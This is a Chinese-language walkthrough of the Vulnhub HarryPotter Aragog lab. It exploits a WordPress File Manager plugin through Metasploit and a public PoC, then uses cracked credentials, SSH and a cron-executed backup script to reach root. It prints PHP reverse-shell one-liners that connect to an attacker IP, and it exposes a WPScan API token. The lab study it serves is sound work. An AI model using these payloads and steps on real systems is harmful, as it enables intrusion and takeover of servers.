Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

news2024/12/24 0:54:34

文章目录

    • 方式一
      • 信息收集
        • 主机发现
        • 端口扫描
        • 目录扫描
        • wpscan工具
      • 漏洞利用
        • msf工具
        • 数据库权限
        • 用户权限
        • root提权
    • 方式二
      • 信息收集
        • gobuster扫描
        • wpscan扫描
      • 漏洞利用
        • POC

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

image-20230909141557109

方式一

信息收集

主机发现

 sudo arp-scan -l

image-20230909142434034

端口扫描

image-20230909142758976

目录扫描

image-20230909143001315

看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

index.html

在这里插入图片描述

blog

网页没有样式

image-20230909143611031

查看网页源码

image-20230909145217560

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

image-20230909150646841

发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909152924966

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具

msf6 > search wordpress file manager

image-20230909152800629

use 1
info

查看需要配置的信息

image-20230909153122178

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

image-20230909153409333

hagrid98家目录下得到一串base64格式加密的数据

image-20230909153659725

使用BurpSuiteDecoder功能解码

image-20230909154142824

image-20230909154319918

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

image-20230909154904019

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

image-20230909155308470

image-20230909155207845

使用得到用户名root,密码mySecr3tPass,来连接数据库

image-20230909155552313

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

image-20230909155648996

在线解密网站

image-20230909155752228

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

image-20230909160013119

root提权

使用sudo suid查询后发现没有可利用的

image-20230909160301316

然后查找备份文件,查看有没有.sh结尾的文件

find / -name '*.sh'

image-20230909160243232

image-20230909160620277

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

image-20230909164505639

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell


kali监听6868端口

image-20230909161708723

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

image-20230909162429837

image-20230909164442869

方式二

信息收集

gobuster扫描

└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

image-20230909165253792

wpscan扫描

wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909165849419

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

image-20230909170028124

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

image-20230909170702430

生成反弹 shell写入到payload.php文件里

php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20230909171334454

运行脚本,得到反弹shell地址

image-20230909171426970

地址中多写了一个/blog,删除即可

image-20230909171908665

等一会就反弹到了

image-20230909172037019

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/994553.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

入门人工智能 —— 学习条件语句、循环语句、使用 Python 的数据结构来存储和组织数据,例如列表、字典、集合(3)

入门人工智能 —— 学习条件语句、循环语句、使用 Python 的数据结构来存储和组织数据,例如列表、字典、集合 1. 条件语句&#xff08;Conditional Statements&#xff09;2. 循环语句&#xff08;Loop Statements&#xff09;使用 for 循环&#xff1a;使用 while 循环&#x…

Spring Cache:提高应用性能的策略和技巧

&#x1f337;&#x1f341; 博主猫头虎&#xff08;&#x1f405;&#x1f43e;&#xff09;带您 Go to New World✨&#x1f341; &#x1f984; 博客首页——&#x1f405;&#x1f43e;猫头虎的博客&#x1f390; &#x1f433; 《面试题大全专栏》 &#x1f995; 文章图文…

Java项目基于SpringBoot藏区特产销售系统,可作为毕业设计

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝30W,Csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 今天为大家带来的是基于 Java SpringBootVue 的藏区特产销售系统 文章目录 1. 简介2.主要技术3 功能分析4 系…

Python超入门(3)__迅速上手操作掌握Python

# 11.if语句 is_student True # bool类型 is_teacher Falseif is_student:print("请到操场集合") elif is_teacher:print("请到办公室集合") else:print("请离开学校") print("谢谢合作") """ 请到操场集合 谢谢合…

javaee springMVC的简单使用 jsp页面在webapp和web-inf目录下的区别

项目结构 依赖文件 <?xml version"1.0" encoding"UTF-8"?><project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation"http://maven.apache.org/…

【网络编程】学习成果day7:用sqlite3和fgetc将字典写入数据库中的数据表。

1.将字典写入数据库中的数据表 代码&#xff1a; linuxlinux:~/study/NETbc$ cat 03_dictsqlite3.c #include<myhead.h> #define MAX 50int do_insert(sqlite3* db);int main(int argc, const char *argv[]) {//打开数据库sqlite3 *dbNULL;if(sqlite3_open("./dic…

【补】代码随想录算法训练营day38|动态规划 |509. 斐波那契数|70. 爬楼梯|746. 使用最小花费爬楼梯

动态规划&#xff0c;英文&#xff1a;Dynamic Programming&#xff0c;简称DP&#xff0c;如果某一问题有很多重叠子问题&#xff0c;使用动态规划是最有效的。所以动态规划中每一个状态一定是由上一个状态推导出来的&#xff0c;这一点就区分于贪心&#xff0c;贪心没有状态推…

030:vue中使用md5进行数据加密示例

第030个 查看专栏目录: VUE ------ element UI 专栏目标 在vue和element UI联合技术栈的操控下&#xff0c;本专栏提供行之有效的源代码示例和信息点介绍&#xff0c;做到灵活运用。 &#xff08;1&#xff09;提供vue2的一些基本操作&#xff1a;安装、引用&#xff0c;模板使…

Spring Boot深度解析:快速开发的秘密

&#x1f337;&#x1f341; 博主猫头虎&#xff08;&#x1f405;&#x1f43e;&#xff09;带您 Go to New World✨&#x1f341; &#x1f984; 博客首页——&#x1f405;&#x1f43e;猫头虎的博客&#x1f390; &#x1f433; 《面试题大全专栏》 &#x1f995; 文章图文…

【李宏毅】深度学习6:机器学习任务攻略

如果在测试集上的效果不佳&#xff0c;应该要做什么&#xff1f;Optimization 如何选择&#xff1f;解决 overfitting 的方法&#xff1f; 测试集上的效果不佳 看训练数据的loss&#xff0c;是不是模型本身就没训练好&#xff1f; 问题&#xff1a;model 太简单了&#xff0c…

Python 内置函数速查手册(函数大全,带示例)

1. abs() abs() 返回数字的绝对值。 >>> abs(-7) **输出&#xff1a;**7 >>> abs(7) 输出&#xff1a; 7 2. all() all() 将容器作为参数。如果 python 可迭代对象中的所有值都是 True &#xff0c;则此函数返回 True。空值为 False。 >>>…

初识MyBatis(搭建MyBatis、简单增删改查、核心配置文件讲解及获取参数值)

文章目录 前言一、MyBatis简介1.Mybatis历史2.MyBatis特性3.对比&#xff08;其他持久化层技术&#xff09; 二、搭建MyBatis1.开发环境2.创建maven工程3.创建MyBatis核心配置文件4.创建mapper接口5.创建MyBatis的映射文件6.通过junit测试功能7.加入log4j日志功能 8.核心配置文…

BPPISE数据科学案例框架

本专题共10篇内容&#xff0c;包含淘宝APP基础链路过去一年在用户体验数据科学领域&#xff08;包括商详、物流、性能、消息、客服、旅程等&#xff09;一些探索和实践经验。 在商详页基于用户动线和VOC挖掘用户决策因子带来浏览体验提升&#xff1b;在物流侧洞察用户求助时间与…

黑盒测试中的决策表设计

前言 在软件开发中&#xff0c;测试是不可或缺的一个环节。其中&#xff0c;黑盒测试是一种比较常用的测试方法。它强调测试人员不需要知道程序内部结构&#xff0c;只需根据程序规格说明书来设计测试用例进行测试。本文将介绍黑盒测试中的一种决策表设计方法。 同时&#xf…

arx实现三维实体贴材质图

最近接了一个需求。 给三维实体贴材质图&#xff0c;群友要求自己绘制了家具的三维实体后&#xff0c;需要对不同家具做不同的材质处理&#xff0c;比如桐木家具&#xff0c;不锈钢家具等。通过颜色是无法解决的。所以就想做一个三维实体贴材质图片的arx。 结果如下&#xff1a…

RuntimeError: CUDA error: an illegal memory access was encountered 解决思路

问题描述&#xff1a; 在跑编译正常通过&#xff0c;CPU上也正常运行的某项目时&#xff0c;在运行到某个epoch时&#xff0c;程序突然出现以下错误&#xff1a; RuntimeError: CUDA error: an illegal memory access was encountered CUDA kernel errors might be asynchron…

【STM32教程】第四章 STM32的外部中断EXTI

案例代码及相关资料下载链接&#xff1a; 链接&#xff1a;https://pan.baidu.com/s/1hsIibEmsB91xFclJd-YTYA?pwdjauj 提取码&#xff1a;jauj 1 中断系统 1.1 中断的概念 中断系统的定义&#xff1a;中断是指在主程序运行过程中&#xff0c;出现了特定的中断触发条件…

创建的源文件后缀不是.c,在一些编译器上不能编译

问题描述&#xff1a; 源文件的名字和后缀写的比较随意&#xff0c;后缀不是.c&#xff0c;代码没有语法高亮&#xff0c;可能在一些编译器上不能编译通过。 现象&#xff1a; 解决办法&#xff1a; C语言代码中我们有约定&#xff1a;源文件的后缀是.c&#xff0c;头文件的后…

Java基础之static关键字

目录 静态的特点第一章、静态代码块第二章、静态属性第三章、静态方法调用静态方法时静态方法中调用非静态方法时 第四章、static关键字与其他关键字 友情提醒 先看文章目录&#xff0c;大致了解文章知识点结构&#xff0c;点击文章目录可直接跳转到文章指定位置。 静态的特点…

Jenkins 页面部分显示Http状态403 被禁止

前言 生产环境Jenkins部署了一段时间了&#xff0c;结果今天在流水线配置中&#xff0c;部分页面显示Jenkins 页面部分显示Http状态403 被禁止&#xff0c;修改配置点击保存之后偶尔也会出现这个。 问题 以下是问题图片 解决 在全局安全配置里面&#xff0c;勾选上启用代…